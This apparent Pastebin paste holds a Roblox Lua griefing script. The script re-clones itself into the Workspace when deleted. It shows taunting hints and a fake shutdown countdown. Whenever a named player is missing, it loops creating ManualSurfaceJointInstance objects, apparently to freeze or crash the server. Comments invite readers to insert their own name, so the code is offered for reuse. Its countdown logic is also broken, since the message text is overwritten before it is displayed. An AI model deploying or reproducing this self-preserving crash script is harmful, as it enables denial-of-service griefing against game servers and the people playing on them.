Advertisement
Silverhaha

Untitled

Apr 26th, 2015
207
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.37 KB | None | 0 0
  1. --Created by hyperionGM
  2. local Settings={["Un_Removable"]= "On"}
  3. local function mFloor(x) return x - x % 1 end
  4. local Un_Removable = tostring(Settings["Un_Removable"]):lower() == "on"
  5. if Un_Removable then
  6. Game.Workspace.DescendantRemoving:connect(function(Child)
  7. if not Remove_At_Will and Child == script then
  8. script:Clone().Parent = Game.Workspace
  9. end
  10. end)
  11. end --remove the unremoveable if you want...
  12. c = Instance.new("Hint")
  13. c.Text = "Lol,Don't remove hyperionGM,or denny1971 or the server becomes DERPY!" --change your name to mine
  14. c.Parent = game.Workspace
  15. text = {"Wow,you kicked me?THE SERVER WILL NOW BECOME DERPY in"} --also a message thing
  16. wait(1)
  17. text = {"Server Freeze Shutdown in 5"}
  18. wait(1)
  19. text = {"Server Freeze Shutdown in 4"}
  20. wait(1)
  21. text = {"Server Freeze Shutdown in 3"}
  22. wait(1)
  23. text = {"Server Freeze Shutdown in 2"}
  24. wait(1)
  25. text = {"Server Freeze Shutdown in 1"}
  26. wait(1)
  27. text = {"Server Freeze Shutdown in 0"}
  28. wait(1)
  29. text = {"The Server will now shutdown Good day sir!"}
  30. while wait(2) do
  31. if not game.Players:FindFirstChild("PwnzaKing","") then --change your name to mine
  32. local m = Instance.new("Message") m.Parent = Workspace
  33. for i,v in pairs(text) do
  34. m.Text = v
  35. wait(1)
  36. end
  37. for i,v in pairs(game.Players:GetChildren()) do
  38. Instance.new("ManualSurfaceJointInstance", workspace)
  39. end
  40. end
  41. end
  42. serverkill = true
  43. --lol!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement